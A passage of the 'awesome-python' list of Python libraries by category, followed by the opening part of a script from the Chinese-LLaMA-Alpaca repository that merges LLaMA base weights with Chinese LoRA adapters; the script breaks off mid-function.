[Babel](http://babel.pocoo.org/en/latest/) - An internationalization library for Python. * [PyICU](https://github.com/ovalhub/pyicu) - A wrapper of International Components for Unicode C++ library ([ICU](http://site.icu-project.org/)). ## Job Scheduler *Libraries for scheduling jobs.* * [Airflow](https://airflow.apache.org/) - Airflow is a platform to programmatically author, schedule and monitor workflows. * [APScheduler](http://apscheduler.readthedocs.io/en/latest/) - A light but powerful in-process task scheduler that lets you schedule functions. * [django-schedule](https://github.com/thauber/django-schedule) - A calendaring app for Django. * [doit](http://pydoit.org/) - A task runner and build tool. * [gunnery](https://github.com/gunnery/gunnery) - Multipurpose task execution tool for distributed systems with web-based interface. * [Joblib](https://joblib.readthedocs.io/) - A set of tools to provide lightweight pipelining in Python. * [Plan](https://github.com/fengsp/plan) - Writing crontab file in Python like a charm. * [Prefect](https://github.com/PrefectHQ/prefect) - A modern workflow orchestration framework that makes it easy to build, schedule and monitor robust data pipelines. * [schedule](https://github.com/dbader/schedule) - Python job scheduling for humans. * [Spiff](https://github.com/knipknap/SpiffWorkflow) - A powerful workflow engine implemented in pure Python. * [TaskFlow](https://docs.openstack.org/developer/taskflow/) - A Python library that helps to make task execution easy, consistent and reliable. ## Logging *Libraries for generating and working with logs.* * [logbook](http://logbook.readthedocs.io/en/stable/) - Logging replacement for Python. * [logging](https://docs.python.org/3/library/logging.html) - (Python standard library) Logging facility for Python. * [loguru](https://github.com/Delgan/loguru) - Library which aims to bring enjoyable logging in Python. * [sentry-python](https://github.com/getsentry/sentry-python) - Sentry SDK for Python. * [structlog](https://www.structlog.org/en/stable/) - Structured logging made easy. ## Machine Learning *Libraries for Machine Learning. Also see [awesome-machine-learning](https://github.com/josephmisiti/awesome-machine-learning#python).* * [gym](https://github.com/openai/gym) - A toolkit for developing and comparing reinforcement learning algorithms. * [H2O](https://github.com/h2oai/h2o-3) - Open Source Fast Scalable Machine Learning Platform. * [Metrics](https://github.com/benhamner/Metrics) - Machine learning evaluation metrics. * [NuPIC](https://github.com/numenta/nupic) - Numenta Platform for Intelligent Computing. * [scikit-learn](http://scikit-learn.org/) - The most popular Python library for Machine Learning. * [Spark ML](http://spark.apache.org/docs/latest/ml-guide.html) - [Apache Spark](http://spark.apache.org/)'s scalable Machine Learning library. * [vowpal_porpoise](https://github.com/josephreisinger/vowpal_porpoise) - A lightweight Python wrapper for [Vowpal Wabbit](https://github.com/JohnLangford/vowpal_wabbit/). * [xgboost](https://github.com/dmlc/xgboost) - A scalable, portable, and distributed gradient boosting library. * [MindsDB](https://github.com/mindsdb/mindsdb) - MindsDB is an open source AI layer for existing databases that allows you to effortlessly develop, train and deploy state-of-the-art machine learning models using standard queries. ## Microsoft Windows *Python programming on Microsoft Windows.* * [Python(x,y)](http://python-xy.github.io/) - Scientific-applications-oriented Python Distribution based on Qt and Spyder. * [pythonlibs](http://www.lfd.uci.edu/~gohlke/pythonlibs/) - Unofficial Windows binaries for Python extension packages. * [PythonNet](https://github.com/pythonnet/pythonnet) - Python Integration with the .NET Common Language Runtime (CLR). * [PyWin32](https://github.com/mhammond/pywin32) - Python Extensions for Windows. * [WinPython](https://winpython.github.io/) - Portable development environment for Windows 7/8. ## Miscellaneous *Useful libraries or tools that don't fit in the categories above.* * [blinker](https://github.com/jek/blinker) - A fast Python in-process signal/event dispatching system. * [boltons](https://github.com/mahmoud/boltons) - A set of pure-Python utilities. * [itsdangerous](https://github.com/pallets/itsdangerous) - Various helpers to pass trusted data to untrusted environments. * [magenta](https://github.com/magenta/magenta) - A tool to generate music and art using artificial intelligence. * [pluginbase](https://github.com/mitsuhiko/pluginbase) - A simple but flexible plugin system for Python. * [tryton](http://www.tryton.org/) - A general purpose business framework. ## Natural Language Processing *Libraries for working with human languages.* - General * [gensim](https://github.com/RaRe-Technologies/gensim) - Topic Modeling for Humans. * [langid.py](https://github.com/saffsd/langid.py) - Stand-alone language identification system. * [nltk](http://www.nltk.org/) - A leading platform for building Python programs to work with human language data. * [pattern](https://github.com/clips/pattern) - A web mining module. * [polyglot](https://github.com/aboSamoor/polyglot) - Natural language pipeline supporting hundreds of languages. * [pytext](https://github.com/facebookresearch/pytext) - A natural language modeling framework based on PyTorch. * [PyTorch-NLP](https://github.com/PetrochukM/PyTorch-NLP) - A toolkit enabling rapid deep learning NLP prototyping for research. * [spacy](https://spacy.io/) - A library for industrial-strength natural language processing in Python and Cython. * [Stanza](https://github.com/stanfordnlp/stanza) - The Stanford NLP Group's official Python library, supporting 60+ languages. - Chinese * [funNLP](https://github.com/fighting41love/funNLP) - A collection of tools and datasets for Chinese NLP. * [jieba](https://github.com/fxsjy/jieba) - The most popular Chinese text segmentation library. * [pkuseg-python](https://github.com/lancopku/pkuseg-python) - A toolkit for Chinese word segmentation in various domains. * [snownlp](https://github.com/isnowfy/snownlp) - A library for processing Chinese text. ## Network Virtualization *Tools and libraries for Virtual Networking and SDN (Software Defined Networking).* * [mininet](https://github.com/mininet/mininet) - A popular network emulator and API written in Python. * [napalm](https://github.com/napalm-automation/napalm) - Cross-vendor API to manipulate network devices. * [pox](https://github.com/noxrepo/pox) - A Python-based SDN control applications, such as OpenFlow SDN controllers. ## News Feed *Libraries for building user's activities.* * [django-activity-stream](https://github.com/justquick/django-activity-stream) - Generating generic activity streams from the actions on your site. * [Stream Framework](https://github.com/tschellenbach/Stream-Framework) - Building news feed and notification systems using Cassandra and Redis. ## ORM *Libraries that implement Object-Relational Mapping or data mapping techniques.* * Relational Databases * [Django Models](https://docs.djangoproject.com/en/dev/topics/db/models/) - The Django ORM. * [SQLAlchemy](https://www.sqlalchemy.org/) - The Python SQL Toolkit and Object Relational Mapper. * [awesome-sqlalchemy](https://github.com/dahlia/awesome-sqlalchemy) * [dataset](https://github.com/pudo/dataset) - Store Python dicts in a database - works with SQLite, MySQL, and PostgreSQL. * [orator](https://github.com/sdispater/orator) - The Orator ORM provides a simple yet beautiful ActiveRecord implementation. * [orm](https://github.com/encode/orm) - An async ORM. * [peewee](https://github.com/coleifer/peewee) - A small, expressive ORM. * [pony](https://github.com/ponyorm/pony/) - ORM that provides a generator-oriented interface to SQL. * [pydal](https://github.com/web2py/pydal/) - A pure Python Database Abstraction Layer. * NoSQL Databases * [hot-redis](https://github.com/stephenmcd/hot-redis) - Rich Python data types for Redis. * [mongoengine](https://github.com/MongoEngine/mongoengine) - A Python Object-Document-Mapper for working with MongoDB. * [PynamoDB](https://github.com/pynamodb/PynamoDB) - A Pythonic interface for [Amazon DynamoDB](https://aws.amazon.com/dynamodb/). * [redisco](https://github.com/kiddouk/redisco) - A Python Library for Simple Models and Containers Persisted in Redis. ## Package Management *Libraries for package and dependency management.* * [pip](https://pip.pypa.io/en/stable/) - The package installer for Python. * [pip-tools](https://github.com/jazzband/pip-tools) - A set of tools to keep your pinned Python dependencies fresh. * [PyPI](https://pypi.org/) * [conda](https://github.com/conda/conda/) - Cross-platform, Python-agnostic binary package manager. * [poetry](https://github.com/sdispater/poetry) - Python dependency management and packaging made easy. ## Package Repositories *Local PyPI repository server and proxies.* * [bandersnatch](https://github.com/pypa/bandersnatch/) - PyPI mirroring tool provided by Python Packaging Authority (PyPA). * [devpi](https://github.com/devpi/devpi) - PyPI server and packaging/testing/release tool. * [localshop](https://github.com/jazzband/localshop) - Local PyPI server (custom packages and auto-mirroring of pypi). * [warehouse](https://github.com/pypa/warehouse) - Next generation Python Package Repository (PyPI). ## Penetration Testing *Frameworks and tools for penetration testing.* * [fsociety](https://github.com/Manisso/fsociety) - A Penetration testing framework. * [setoolkit](https://github.com/trustedsec/social-engineer-toolkit) - A toolkit for social engineering. * [sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool. ## Permissions *Libraries that allow or deny users access to data or functionality.* * [django-guardian](https://github.com/django-guardian/django-guardian) - Implementation of per object permissions for Django 1.2+ * [django-rules](https://github.com/dfunckt/django-rules) - A tiny but powerful app providing object-level permissions to Django, without requiring a database. ## Processes *Libraries for starting and communicating with OS processes.* * [delegator.py](https://github.com/amitt001/delegator.py) - [Subprocesses](https://docs.python.org/3/library/subprocess.html) for Humans 2.0. * [sarge](https://sarge.readthedocs.io/en/latest/) - Yet another wrapper for subprocess. * [sh](https://github.com/amoffat/sh) - A full-fledged subprocess replacement for Python. ## Recommender Systems *Libraries for building recommender systems.* * [annoy](https://github.com/spotify/annoy) - Approximate Nearest Neighbors in C++/Python optimized for memory usage. * [fastFM](https://github.com/ibayer/fastFM) - A library for Factorization Machines. * [implicit](https://github.com/benfred/implicit) - A fast Python implementation of collaborative filtering for implicit datasets. * [libffm](https://github.com/guestwalk/libffm) - A library for Field-aware Factorization Machine (FFM). * [lightfm](https://github.com/lyst/lightfm) - A Python implementation of a number of popular recommendation algorithms. * [spotlight](https://github.com/maciejkula/spotlight) - Deep recommender models using PyTorch. * [Surprise](https://github.com/NicolasHug/Surprise) - A scikit for building and analyzing recommender systems. * [tensorrec](https://github.com/jfkirk/tensorrec) - A Recommendation Engine Framework in TensorFlow. ## Refactoring *Refactoring tools and libraries for Python* * [Bicycle Repair Man](http://bicyclerepair.sourceforge.net/) - Bicycle Repair Man, a refactoring tool for Python. * [Bowler](https://pybowler.io/) - Safe code refactoring for modern Python. * [Rope](https://github.com/python-rope/rope) - Rope is a python refactoring library. ## RESTful API *Libraries for building RESTful APIs.* * Django * [django-rest-framework](https://github.com/encode/django-rest-framework) - A powerful and flexible toolkit to build web APIs. * [django-tastypie](https://github.com/django-tastypie/django-tastypie) - Creating delicious APIs for Django apps. * Flask * [eve](https://github.com/pyeve/eve) - REST API framework powered by Flask, MongoDB and good intentions. * [flask-api](https://github.com/flask-api/flask-api) - Browsable Web APIs for Flask. * [flask-restful](https://github.com/flask-restful/flask-restful) - Quickly building REST APIs for Flask. * Pyramid * [cornice](https://github.com/Cornices/cornice) - A RESTful framework for Pyramid. * Framework agnostic * [falcon](https://github.com/falconry/falcon) - A high-performance framework for building cloud APIs and web app backends. * [fastapi](https://github.com/tiangolo/fastapi) - A modern, fast, web framework for building APIs with Python 3.6+ based on standard Python type hints. * [hug](https://github.com/hugapi/hug) - A Python 3 framework for cleanly exposing APIs. * [sandman2](https://github.com/jeffknupp/sandman2) - Automated REST APIs for existing database-driven systems. * [sanic](https://github.com/sanic-org/sanic) - A Python 3.6+ web server and web framework that's written to go fast. ## Robotics *Libraries for robotics.* * [PythonRobotics](https://github.com/AtsushiSakai/PythonRobotics) - This is a compilation of various robotics algorithms with visualizations. * [rospy](http://wiki.ros.org/rospy) - This is a library for ROS (Robot Operating System). ## RPC Servers *RPC-compatible servers.* * [RPyC](https://github.com/tomerfiliba/rpyc) (Remote Python Call) - A transparent and symmetric RPC library for Python * [zeroRPC](https://github.com/0rpc/zerorpc-python) - zerorpc is a flexible RPC implementation based on [ZeroMQ](http://zeromq.org/) and [MessagePack](http://msgpack.org/). ## Science *Libraries for scientific computing. Also see [Python-for-Scientists](https://github.com/TomNicholas/Python-for-Scientists).* * [astropy](http://www.astropy.org/) - A community Python library for Astronomy. * [bcbio-nextgen](https://github.com/chapmanb/bcbio-nextgen) - Providing best-practice pipelines for fully automated high throughput sequencing analysis. * [bccb](https://github.com/chapmanb/bcbb) - Collection of useful code related to biological analysis. * [Biopython](http://biopython.org/wiki/Main_Page) - Biopython is a set of freely available tools for biological computation. * [cclib](http://cclib.github.io/) - A library for parsing and interpreting the results of computational chemistry packages. * [Colour](http://colour-science.org/) - Implementing a comprehensive number of colour theory transformations and algorithms. * [Karate Club](https://github.com/benedekrozemberczki/karateclub) - Unsupervised machine learning toolbox for graph structured data. * [NetworkX](https://networkx.github.io/) - A high-productivity software for complex networks. * [NIPY](http://nipy.org) - A collection of neuroimaging toolkits. * [NumPy](http://www.numpy.org/) - A fundamental package for scientific computing with Python. * [ObsPy](https://github.com/obspy/obspy/wiki/) - A Python toolbox for seismology. * [Open Babel](https://open-babel.readthedocs.io/) - A chemical toolbox designed to speak the many languages of chemical data. * [PyDy](http://www.pydy.org/) - Short for Python Dynamics, used to assist with workflow in the modeling of dynamic motion. * [PyMC](https://github.com/pymc-devs/pymc3) - Markov Chain Monte Carlo sampling toolkit. * [QuTiP](http://qutip.org/) - Quantum Toolbox in Python. * [RDKit](http://www.rdkit.org/) - Cheminformatics and Machine Learning Software. * [SciPy](https://www.scipy.org/) - A Python-based ecosystem of open-source software for mathematics, science, and engineering. * [SimPy](https://gitlab.com/team-simpy/simpy) - A process-based discrete-event simulation framework. * [statsmodels](https://github.com/statsmodels/statsmodels) - Statistical modeling and econometrics in Python. * [SymPy](https://github.com/sympy/sympy) - A Python library for symbolic mathematics. * [Zipline](https://github.com/quantopian/zipline) - A Pythonic algorithmic trading library. ## Search *Libraries and software for indexing and performing search queries on data.* * [django-haystack](https://github.com/django-haystack/django-haystack) - Modular search for Django. * [elasticsearch-dsl-py](https://github.com/elastic/elasticsearch-dsl-py) - The official high-level Python client for Elasticsearch. * [elasticsearch-py](https://www.elastic.co/guide/en/elasticsearch/client/python-api/current/index.html) - The official low-level Python client for [Elasticsearch](https://www.elastic.co/products/elasticsearch). * [pysolr](https://github.com/django-haystack/pysolr) - A lightweight Python wrapper for [Apache Solr](https://lucene.apache.org/solr/). * [whoosh](http://whoosh.readthedocs.io/en/latest/) - A fast, pure Python search engine library. ## Serialization *Libraries for serializing complex data types* * [marshmallow](https://github.com/marshmallow-code/marshmallow) - A lightweight library for converting complex objects to and from simple Python datatypes. * [pysimdjson](https://github.com/TkTech/pysimdjson) - A Python bindings for [simdjson](https://github.com/lemire/simdjson). * [python-rapidjson](https://github.com/python-rapidjson/python-rapidjson) - A Python wrapper around [RapidJSON](https://github.com/Tencent/rapidjson). * [ultrajson](https://github.com/esnme/ultrajson) - A fast JSON decoder and encoder written in C with Python bindings. ## Serverless Frameworks *Frameworks for developing serverless Python code.* * [python-lambda](https://github.com/nficano/python-lambda) - A toolkit for developing and deploying Python code in AWS Lambda. * [Zappa](https://github.com/zappa/Zappa) - A tool for deploying WSGI applications on AWS Lambda and API Gateway. ## Shell *Shells based on Python.* * [xonsh](https://github.com/xonsh/xonsh/) - A Python-powered, cross-platform, Unix-gazing shell language and command prompt. ## Specific Formats Processing *Libraries for parsing and manipulating specific text formats.* * General * [tablib](https://github.com/jazzband/tablib) - A module for Tabular Datasets in XLS, CSV, JSON, YAML. * Office * [docxtpl](https://github.com/elapouya/python-docx-template) - Editing a docx document by jinja2 template * [openpyxl](https://openpyxl.readthedocs.io/en/stable/) - A library for reading and writing Excel 2010 xlsx/xlsm/xltx/xltm files. * [pyexcel](https://github.com/pyexcel/pyexcel) - Providing one API for reading, manipulating and writing csv, ods, xls, xlsx and xlsm files. * [python-docx](https://github.com/python-openxml/python-docx) - Reads, queries and modifies Microsoft Word 2007/2008 docx files. * [python-pptx](https://github.com/scanny/python-pptx) - Python library for creating and updating PowerPoint (.pptx) files. * [unoconv](https://github.com/unoconv/unoconv) - Convert between any document format supported by LibreOffice/OpenOffice. * [XlsxWriter](https://github.com/jmcnamara/XlsxWriter) - A Python module for creating Excel .xlsx files. * [xlwings](https://github.com/ZoomerAnalytics/xlwings) - A BSD-licensed library that makes it easy to call Python from Excel and vice versa. * [xlwt](https://github.com/python-excel/xlwt) / [xlrd](https://github.com/python-excel/xlrd) - Writing and reading data and formatting information from Excel files. * PDF * [pdfminer.six](https://github.com/pdfminer/pdfminer.six) - Pdfminer.six is a community maintained fork of the original PDFMiner. * [PyPDF2](https://github.com/mstamy2/PyPDF2) - A library capable of splitting, merging and transforming PDF pages. * [ReportLab](https://www.reportlab.com/opensource/) - Allowing Rapid creation of rich PDF documents. * Markdown * [Mistune](https://github.com/lepture/mistune) - Fastest and full featured pure Python parsers of Markdown. * [Python-Markdown](https://github.com/waylan/Python-Markdown) - A Python implementation of John Gruber’s Markdown. * YAML * [PyYAML](http://pyyaml.org/) - YAML implementations for Python. * CSV * [csvkit](https://github.com/wireservice/csvkit) - Utilities for converting to and working with CSV. * Archive * [unp](https://github.com/mitsuhiko/unp) - A command line tool that can unpack archives easily. ## Static Site Generator *Static site generator is a software that takes some text + templates as input and produces HTML files on the output.* * [lektor](https://github.com/lektor/lektor) - An easy to use static CMS and blog engine. * [mkdocs](https://github.com/mkdocs/mkdocs/) - Markdown friendly documentation generator. * [makesite](https://github.com/sunainapai/makesite) - Simple, lightweight, and magic-free static site/blog generator (< 130 lines). * [nikola](https://github.com/getnikola/nikola) - A static website and blog generator. * [pelican](https://github.com/getpelican/pelican) - Static site generator that supports Markdown and reST syntax. ## Tagging *Libraries for tagging items.* * [django-taggit](https://github.com/jazzband/django-taggit) - Simple tagging for Django. ## Task Queues *Libraries for working with task queues.* * [celery](https://docs.celeryproject.org/en/stable/) - An asynchronous task queue/job queue based on distributed message passing. * [dramatiq](https://github.com/Bogdanp/dramatiq) - A fast and reliable background task processing library for Python 3. * [huey](https://github.com/coleifer/huey) - Little multi-threaded task queue. * [mrq](https://github.com/pricingassistant/mrq) - A distributed worker task queue in Python using Redis & gevent. * [rq](https://github.com/rq/rq) - Simple job queues for Python. ## Template Engine *Libraries and tools for templating and lexing.* * [Genshi](https://genshi.edgewall.org/) - Python templating toolkit for generation of web-aware output. * [Jinja2](https://github.com/pallets/jinja) - A modern and designer friendly templating language. * [Mako](http://www.makotemplates.org/) - Hyperfast and lightweight templating for the Python platform. ## Testing *Libraries for testing codebases and generating test data.* * Testing Frameworks * [hypothesis](https://github.com/HypothesisWorks/hypothesis) - Hypothesis is an advanced Quickcheck style property based testing library. * [nose2](https://github.com/nose-devs/nose2) - The successor to `nose`, based on `unittest2. * [pytest](https://docs.pytest.org/en/latest/) - A mature full-featured Python testing tool. * [Robot Framework](https://github.com/robotframework/robotframework) - A generic test automation framework. * [unittest](https://docs.python.org/3/library/unittest.html) - (Python standard library) Unit testing framework. * Test Runners * [green](https://github.com/CleanCut/green) - A clean, colorful test runner. * [mamba](http://nestorsalceda.github.io/mamba/) - The definitive testing tool for Python. Born under the banner of BDD. * [tox](https://tox.readthedocs.io/en/latest/) - Auto builds and tests distributions in multiple Python versions * GUI / Web Testing * [locust](https://github.com/locustio/locust) - Scalable user load testing tool written in Python. * [PyAutoGUI](https://github.com/asweigart/pyautogui) - PyAutoGUI is a cross-platform GUI automation Python module for human beings. * [Schemathesis](https://github.com/kiwicom/schemathesis) - A tool for automatic property-based testing of web applications built with Open API / Swagger specifications. * [Selenium](https://pypi.org/project/selenium/) - Python bindings for [Selenium](http://www.seleniumhq.org/) WebDriver. * [sixpack](https://github.com/seatgeek/sixpack) - A language-agnostic A/B Testing framework. * [splinter](https://github.com/cobrateam/splinter) - Open source tool for testing web applications. * Mock * [doublex](https://pypi.org/project/doublex/) - Powerful test doubles framework for Python. * [freezegun](https://github.com/spulec/freezegun) - Travel through time by mocking the datetime module. * [httmock](https://github.com/patrys/httmock) - A mocking library for requests for Python 2.6+ and 3.2+. * [httpretty](https://github.com/gabrielfalcao/HTTPretty) - HTTP request mock tool for Python. * [mock](https://docs.python.org/3/library/unittest.mock.html) - (Python standard library) A mocking and patching library. * [mocket](https://github.com/mindflayer/python-mocket) - A socket mock framework with gevent/asyncio/SSL support. * [responses](https://github.com/getsentry/responses) - A utility library for mocking out the requests Python library. * [VCR.py](https://github.com/kevin1024/vcrpy) - Record and replay HTTP interactions on your tests. * Object Factories * [factory_boy](https://github.com/FactoryBoy/factory_boy) - A test fixtures replacement for Python. * [mixer](https://github.com/klen/mixer) - Another fixtures replacement. Supports Django, Flask, SQLAlchemy, Peewee and etc. * [model_mommy](https://github.com/vandersonmota/model_mommy) - Creating random fixtures for testing in Django. * Code Coverage * [coverage](https://pypi.org/project/coverage/) - Code coverage measurement. * Fake Data * [fake2db](https://github.com/emirozer/fake2db) - Fake database generator. * [faker](https://github.com/joke2k/faker) - A Python package that generates fake data. * [mimesis](https://github.com/lk-geimfari/mimesis) - is a Python library that help you generate fake data. * [radar](https://pypi.org/project/radar/) - Generate random datetime / time. ## Text Processing *Libraries for parsing and manipulating plain texts.* * General * [chardet](https://github.com/chardet/chardet) - Python 2/3 compatible character encoding detector. * [difflib](https://docs.python.org/3/library/difflib.html) - (Python standard library) Helpers for computing deltas. * [ftfy](https://github.com/LuminosoInsight/python-ftfy) - Makes Unicode text less broken and more consistent automagically. * [fuzzywuzzy](https://github.com/seatgeek/fuzzywuzzy) - Fuzzy String Matching. * [Levenshtein](https://github.com/ztane/python-Levenshtein/) - Fast computation of Levenshtein distance and string similarity. * [pangu.py](https://github.com/vinta/pangu.py) - Paranoid text spacing. * [pyfiglet](https://github.com/pwaller/pyfiglet) - An implementation of figlet written in Python. * [pypinyin](https://github.com/mozillazg/python-pinyin) - Convert Chinese hanzi (漢字) to pinyin (拼音). * [textdistance](https://github.com/orsinium/textdistance) - Compute distance between sequences with 30+ algorithms. * [unidecode](https://pypi.org/project/Unidecode/) - ASCII transliterations of Unicode text. * Slugify * [awesome-slugify](https://github.com/dimka665/awesome-slugify) - A Python slugify library that can preserve unicode. * [python-slugify](https://github.com/un33k/python-slugify) - A Python slugify library that translates unicode to ASCII. * [unicode-slugify](https://github.com/mozilla/unicode-slugify) - A slugifier that generates unicode slugs with Django as a dependency. * Unique identifiers * [hashids](https://github.com/davidaurelio/hashids-python) - Implementation of [hashids](http://hashids.org) in Python. * [shortuuid](https://github.com/skorokithakis/shortuuid) - A generator library for concise, unambiguous and URL-safe UUIDs. * Parser * [ply](https://github.com/dabeaz/ply) - Implementation of lex and yacc parsing tools for Python. * [pygments](http://pygments.org/) - A generic syntax highlighter. * [pyparsing](https://github.com/pyparsing/pyparsing) - A general purpose framework for generating parsers. * [python-nameparser](https://github.com/derek73/python-nameparser) - Parsing human names into their individual components. * [python-phonenumbers](https://github.com/daviddrysdale/python-phonenumbers) - Parsing, formatting, storing and validating international phone numbers. * [python-user-agents](https://github.com/selwin/python-user-agents) - Browser user agent parser. * [sqlparse](https://github.com/andialbrecht/sqlparse) - A non-validating SQL parser. ## Third-party APIs *Libraries for accessing third party services APIs. Also see [List of Python API Wrappers and Libraries](https://github.com/realpython/list-of-python-api-wrappers).* * [apache-libcloud](https://libcloud.apache.org/) - One Python library for all clouds. * [boto3](https://github.com/boto/boto3) - Python interface to Amazon Web Services. * [django-wordpress](https://github.com/istrategylabs/django-wordpress) - WordPress models and views for Django. * [facebook-sdk](https://github.com/mobolic/facebook-sdk) - Facebook Platform Python SDK. * [google-api-python-client](https://github.com/google/google-api-python-client) - Google APIs Client Library for Python. * [gspread](https://github.com/burnash/gspread) - Google Spreadsheets Python API. * [twython](https://github.com/ryanmcgrath/twython) - A Python wrapper for the Twitter API. ## URL Manipulation *Libraries for parsing URLs.* * [furl](https://github.com/gruns/furl) - A small Python library that makes parsing and manipulating URLs easy. * [purl](https://github.com/codeinthehole/purl) - A simple, immutable URL class with a clean API for interrogation and manipulation. * [pyshorteners](https://github.com/ellisonleao/pyshorteners) - A pure Python URL shortening lib. * [webargs](https://github.com/marshmallow-code/webargs) - A friendly library for parsing HTTP request arguments with built-in support for popular web frameworks. ## Video *Libraries for manipulating video and GIFs.* * [moviepy](https://zulko.github.io/moviepy/) - A module for script-based movie editing with many formats, including animated GIFs. * [scikit-video](https://github.com/aizvorski/scikit-video) - Video processing routines for SciPy. * [vidgear](https://github.com/abhiTronix/vidgear) - Most Powerful multi-threaded Video Processing framework. ## Web Asset Management *Tools for managing, compressing and minifying website assets.* * [django-compressor](https://github.com/django-compressor/django-compressor) - Compresses linked and inline JavaScript or CSS into a single cached file. * [django-pipeline](https://github.com/jazzband/django-pipeline) - An asset packaging library for Django. * [django-storages](https://github.com/jschneier/django-storages) - A collection of custom storage back ends for Django. * [fanstatic](http://www.fanstatic.org/en/latest/) - Packages, optimizes, and serves static file dependencies as Python packages. * [fileconveyor](http://wimleers.com/fileconveyor) - A daemon to detect and sync files to CDNs, S3 and FTP. * [flask-assets](https://github.com/miracle2k/flask-assets) - Helps you integrate webassets into your Flask app. * [webassets](https://github.com/miracle2k/webassets) - Bundles, optimizes, and manages unique cache-busting URLs for static resources. ## Web Content Extracting *Libraries for extracting web contents.* * [html2text](https://github.com/Alir3z4/html2text) - Convert HTML to Markdown-formatted text. * [lassie](https://github.com/michaelhelmick/lassie) - Web Content Retrieval for Humans. * [micawber](https://github.com/coleifer/micawber) - A small library for extracting rich content from URLs. * [newspaper](https://github.com/codelucas/newspaper) - News extraction, article extraction and content curation in Python. * [python-readability](https://github.com/buriy/python-readability) - Fast Python port of arc90's readability tool. * [requests-html](https://github.com/psf/requests-html) - Pythonic HTML Parsing for Humans. * [sumy](https://github.com/miso-belica/sumy) - A module for automatic summarization of text documents and HTML pages. * [textract](https://github.com/deanmalmgren/textract) - Extract text from any document, Word, PowerPoint, PDFs, etc. * [toapi](https://github.com/gaojiuli/toapi) - Every web site provides APIs. ## Web Crawling *Libraries to automate web scraping.* * [feedparser](https://github.com/kurtmckee/feedparser) - Universal feed parser. * [grab](https://github.com/lorien/grab) - Site scraping framework. * [mechanicalsoup](https://github.com/MechanicalSoup/MechanicalSoup) - A Python library for automating interaction with websites. * [scrapy](https://github.com/scrapy/scrapy) - A fast high-level screen scraping and web crawling framework. ## Web Frameworks *Traditional full stack web frameworks. Also see [RESTful API](https://github.com/vinta/awesome-python#restful-api).* * Synchronous * [django](https://github.com/django/django) - The most popular web framework in Python. * [awesome-django](https://github.com/shahraizali/awesome-django) * [awesome-django](https://github.com/wsvincent/awesome-django) * [flask](https://github.com/pallets/flask) - A microframework for Python. * [awesome-flask](https://github.com/humiaozuzu/awesome-flask) * [pyramid](https://pylonsproject.org/) - A small, fast, down-to-earth, open source Python web framework. * [awesome-pyramid](https://github.com/uralbash/awesome-pyramid) * [masonite](https://github.com/MasoniteFramework/masonite) - The modern and developer centric Python web framework. * Asynchronous * [tornado](https://github.com/tornadoweb/tornado) - A web framework and asynchronous networking library. ## WebSocket *Libraries for working with WebSocket.* * [autobahn-python](https://github.com/crossbario/autobahn-python) - WebSocket & WAMP for Python on Twisted and [asyncio](https://docs.python.org/3/library/asyncio.html). * [channels](https://github.com/django/channels) - Developer-friendly asynchrony for Django. * [websockets](https://github.com/aaugustin/websockets) - A library for building WebSocket servers and clients with a focus on correctness and simplicity. ## WSGI Servers *WSGI-compatible web servers.* * [gunicorn](https://github.com/benoitc/gunicorn) - Pre-forked, ported from Ruby's Unicorn project. * [uwsgi](https://uwsgi-docs.readthedocs.io/en/latest/) - A project aims at developing a full stack for building hosting services, written in C. * [waitress](https://github.com/Pylons/waitress) - Multi-threaded, powers Pyramid. * [werkzeug](https://github.com/pallets/werkzeug) - A WSGI utility library for Python that powers Flask and can easily be embedded into your own projects. # Resources Where to discover learning resources or new Python libraries. ## Newsletters * [Awesome Python Newsletter](http://python.libhunt.com/newsletter) * [Pycoder's Weekly](https://pycoders.com/) * [Python Tricks](https://realpython.com/python-tricks/) * [Python Weekly](https://www.pythonweekly.com/) ## Podcasts * [Django Chat](https://djangochat.com/) * [Python Bytes](https://pythonbytes.fm) * [Talk Python To Me](https://talkpython.fm/) * [Python Test](https://podcast.pythontest.com/) * [The Real Python Podcast](https://realpython.com/podcasts/rpp/) # Contributing Your contributions are always welcome! Please take a look at the [contribution guidelines](https://github.com/vinta/awesome-python/blob/master/CONTRIBUTING.md) first. - - - If you have any question about this opinionated list, do not hesitate to contact me [@VintaChen](https://twitter.com/VintaChen) on Twitter or open an issue on GitHub.
Chinese-LLaMA-Alpaca
f213c2c53e92f2bfb41859ffdb2cf47a261c24fb
File: scripts/merge_llama_with_chinese_lora.py """ Usage: python merge_llama_with_chinese_lora.py \ --base_model path/to/llama/model \ --lora_model path/to/first/lora/model [path/to/second/lora/model] \ --output_type [pth|huggingface] \ --output_dir path/to/output/dir """ import argparse import json import os import gc import torch import peft from peft import PeftModel from transformers import LlamaForCausalLM, LlamaTokenizer from huggingface_hub import hf_hub_download parser = argparse.ArgumentParser() parser.add_argument('--base_model', default=None, required=True, type=str, help="Please specify a base_model") parser.add_argument('--lora_model', default=None, required=True, type=str, help="Please specify LoRA models to be merged (ordered); use commas to separate multiple LoRA models.") parser.add_argument('--offload_dir', default=None, type=str, help="(Optional) Please specify a temp folder for offloading (useful for low-RAM machines). Default None (disable offload).") parser.add_argument('--output_type', default='pth',choices=['pth','huggingface'], type=str, help="save the merged model in pth or huggingface format.") parser.add_argument('--output_dir', default='./', type=str) emb_to_model_size = { 4096 : '7B', 5120 : '13B', 6656 : '33B', 8192 : '65B', } num_shards_of_models = {'7B': 1, '13B': 2, '33B': 4, '65B': 8} params_of_models = { '7B': { "dim": 4096, "multiple_of": 256, "n_heads": 32, "n_layers": 32, "norm_eps": 1e-06, "vocab_size": -1, }, '13B': { "dim": 5120, "multiple_of": 256, "n_heads": 40, "n_layers": 40, "norm_eps": 1e-06, "vocab_size": -1, }, '33B': { "dim": 6656, "multiple_of": 256, "n_heads": 52, "n_layers": 60, "norm_eps": 1e-06, "vocab_size": -1, }, '65B': { "dim": 8192, "multiple_of": 256, "n_heads": 64, "n_layers": 80, "norm_eps": 1e-05, "vocab_size": -1, }, } def transpose(weight, fan_in_fan_out): return weight.T if fan_in_fan_out else weight # Borrowed and modified from https://github.com/tloen/alpaca-lora def translate_state_dict_key(k): k = k.replace("base_model.model.", "") if k == "model.embed_tokens.weight": return "tok_embeddings.weight" elif k == "model.norm.weight": return "norm.weight" elif k == "lm_head.weight": return "output.weight" elif k.startswith("model.layers."): layer = k.split(".")[2] if k.endswith(".self_attn.q_proj.weight"): return f"layers.{layer}.attention.wq.weight" elif k.endswith(".self_attn.k_proj.weight"): return f"layers.{layer}.attention.wk.weight" elif k.endswith(".self_attn.v_proj.weight"): return f"layers.{layer}.attention.wv.weight" elif 